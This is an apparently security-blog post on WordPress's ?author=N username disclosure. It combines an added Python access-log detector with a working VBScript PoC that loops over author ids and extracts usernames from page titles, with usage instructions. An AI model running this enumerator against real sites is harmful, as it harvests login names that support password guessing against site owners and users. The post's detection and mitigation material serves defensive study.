WordPress UserId & Username Enumeration Exploit/PoC Script
Simple VBScript using XMLHTTP to fetch usernames from a WordPress installation via the ?author= redirect feature.
Background
On 26th May 2011, a relatively easy to detect and exploit vulnerability was found in WordPress. The issue is that WordPress discloses usernames based on a simple URL parameter and the resulting page redirect/HTTP status: requesting /?author=N for an existing user id redirects to that author's archive page, whose title contains the username, while a non-existent id returns a 404. Although showing the author's name in the page title is an intended WordPress feature, it can be abused easily by repeatedly supplying /?author=number to the main page to enumerate usernames. The full disclosure posting can be found at http://seclists.org/fulldisclosure/2011/May/493
Even though there are a lot of scripts/exploits/PoCs already popping up all over the Internet to abuse this, this post will show how easy it is to automate the enumeration using Ajax/XMLHTTP via VBScript.
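The same request pattern that makes the enumeration easy to automate also makes it easy to spot in web server logs: one client walks ?author=1, 2, 3, ... in quick succession and receives a mix of 301 redirects (id exists) and 404s (id does not). The following detector is an added example and not part of the original post; it parses Apache combined-format access lines, groups author probes per client, and raises an alert when a client tries at least THRESHOLD distinct author ids inside a WINDOW (both values are assumptions to tune for the site). The log lines are constructed for the example, not captured from a real server.

```python
"""Detect WordPress ?author=N user enumeration in access logs (added example)."""
import re
from collections import defaultdict
from datetime import timedelta, datetime

# Apache "combined" format: ip ident user [timestamp] "METHOD path PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# author=N anywhere in the query string; /author/<name>/ paths do not count
AUTHOR_RE = re.compile(r'[?&]author=(\d+)(?:&|$)')

THRESHOLD = 5                   # assumed: distinct author ids from one client ...
WINDOW = timedelta(seconds=60)  # assumed: ... within this time window

# Constructed sample traffic: one enumerator, one ordinary visitor.
SAMPLE_LOG = """\
203.0.113.10 - - [26/May/2011:10:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPEnum"
203.0.113.10 - - [26/May/2011:10:00:01 +0000] "GET /author/admin/ HTTP/1.1" 200 5120 "-" "WPEnum"
203.0.113.10 - - [26/May/2011:10:00:02 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "WPEnum"
203.0.113.10 - - [26/May/2011:10:00:02 +0000] "GET /?author=3 HTTP/1.1" 404 1800 "-" "WPEnum"
203.0.113.10 - - [26/May/2011:10:00:03 +0000] "GET /?author=4 HTTP/1.1" 301 0 "-" "WPEnum"
203.0.113.10 - - [26/May/2011:10:00:03 +0000] "GET /?author=5&paged=2 HTTP/1.1" 301 0 "-" "WPEnum"
203.0.113.10 - - [26/May/2011:10:00:04 +0000] "GET /?author=6 HTTP/1.1" 404 1800 "-" "WPEnum"
198.51.100.7 - - [26/May/2011:10:05:00 +0000] "GET /?author=2 HTTP/1.1" 301 0 "-" "Mozilla/5.0"
198.51.100.7 - - [26/May/2011:10:05:01 +0000] "GET /author/editor/ HTTP/1.1" 200 6400 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict with ip, ts, path, status and author id (or None), or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m['ts'], '%d/%b/%Y:%H:%M:%S %z')
    a = AUTHOR_RE.search(m['path'])
    return {
        'ip': m['ip'],
        'ts': ts,
        'path': m['path'],
        'status': int(m['status']),
        'author': int(a.group(1)) if a else None,
    }


def detect_author_enumeration(lines, threshold=THRESHOLD, window=WINDOW):
    """Alert on clients that probe >= threshold distinct author ids within one window.

    A 301/302 on an author probe means WordPress redirected to /author/<name>/,
    i.e. the id exists and the username was exposed; a 404 means it does not.
    """
    per_client = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec['author'] is not None:
            per_client[rec['ip']].append(rec)

    alerts = []
    for ip, recs in per_client.items():
        recs.sort(key=lambda r: r['ts'])
        # Sliding window: find the largest set of distinct ids seen within `window`
        start, best = 0, set()
        for end in range(len(recs)):
            while recs[end]['ts'] - recs[start]['ts'] > window:
                start += 1
            ids = {r['author'] for r in recs[start:end + 1]}
            if len(ids) > len(best):
                best = ids
        if len(best) >= threshold:
            exposed = sum(1 for r in recs if r['status'] in (301, 302))
            alerts.append({
                'ip': ip,
                'distinct_ids': len(best),
                'exposed_users': exposed,
                'first': recs[0]['ts'],
                'last': recs[-1]['ts'],
            })
    return alerts


if __name__ == '__main__':
    for alert in detect_author_enumeration(SAMPLE_LOG.splitlines()):
        print(f"{alert['ip']}: {alert['distinct_ids']} author ids probed, "
              f"{alert['exposed_users']} usernames exposed "
              f"({alert['first']:%H:%M:%S} - {alert['last']:%H:%M:%S})")
```

The ordinary visitor who follows a single author link is below the threshold and is not reported; the enumerator is, together with a count of how many usernames the site actually handed over, which is the number worth knowing when deciding whether to rotate credentials or tighten the login path. The usual mitigation on the WordPress side is to stop answering ?author=N with a redirect to the author archive, either through a rewrite rule on the web server or a plugin/theme hook that sends such requests to the home page instead.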
PoC using VBScript
'Author: karniv0re@null.co.in
'User enumeration script for WordPress v2.6, 3.1, 3.1.1, 3.1.3
'This script allows an attacker to enumerate wordpress users by
'querying the value of the parameter 'author' using xmlHTTP.
Dim url, sQuery, args, i, max, xmlHTTP, k, j, username

If wscript.arguments.count < 1 Then
    wscript.echo "WPEnum – WordPress User Enumeration Script"
    wscript.echo "Author: karniv0re@null.co.in"
    wscript.echo "Insufficient Parameters."
    wscript.echo
    wscript.echo "cscript WPEnum.vbs <url> [<max>]"
    wscript.echo "<url>: A WordPress based website in the form of http://example.com/"
    wscript.echo "<max>: [Optional] Maximum number of users. Default 20."
    wscript.echo "Example: cscript WPEnum.vbs http://example.com/ 10"
    wscript.echo
    wscript.quit
End If

Set args = wscript.Arguments
wscript.echo "WPEnum – WordPress User Enumeration Script"
wscript.echo "Author: karniv0re@null.co.in"
wscript.echo
wscript.echo "Enumerating ..."
wscript.echo

i = 0
max = 20
' Normalise the base URL so "?author=N" can be appended directly
url = args(0)
If Right(url, 1) <> "/" Then
    url = url & "/"
End If
If wscript.arguments.count = 2 And IsNumeric(args(1)) Then
    max = CLng(args(1))
End If

Set xmlHTTP = CreateObject("Microsoft.XmlHttp")
For i = 1 To max
    sQuery = url & "?author=" & i
    ' Synchronous request; XMLHTTP follows the redirect to /author/<name>/ itself
    xmlHTTP.open "GET", sQuery, False
    xmlHTTP.send ""
    wscript.sleep 70
    Do While Not xmlHTTP.readyState = 4
    Loop
    ' WordPress answers 404 for an author id that does not exist, so stop there
    If xmlHTTP.status = 404 Then
        wscript.echo
        i = i - 1
        wscript.echo i & " users enumerated."
        wscript.echo "Done!"
        Set xmlHTTP = Nothing
        wscript.quit
    End If
    wscript.echo "Userid:" & i
    ' The author's name is in the <title> of the page the redirect landed on
    k = InStr(LCase(xmlHTTP.responseText), "<title>")
    j = InStr(LCase(xmlHTTP.responseText), "</title>")
    username = Mid(xmlHTTP.responseText, k + 7, j - k - 7)
    wscript.echo username
    wscript.echo
Next

wscript.echo i & " users enumerated."
wscript.echo "Done!"
Set xmlHTTP = Nothing
'End of program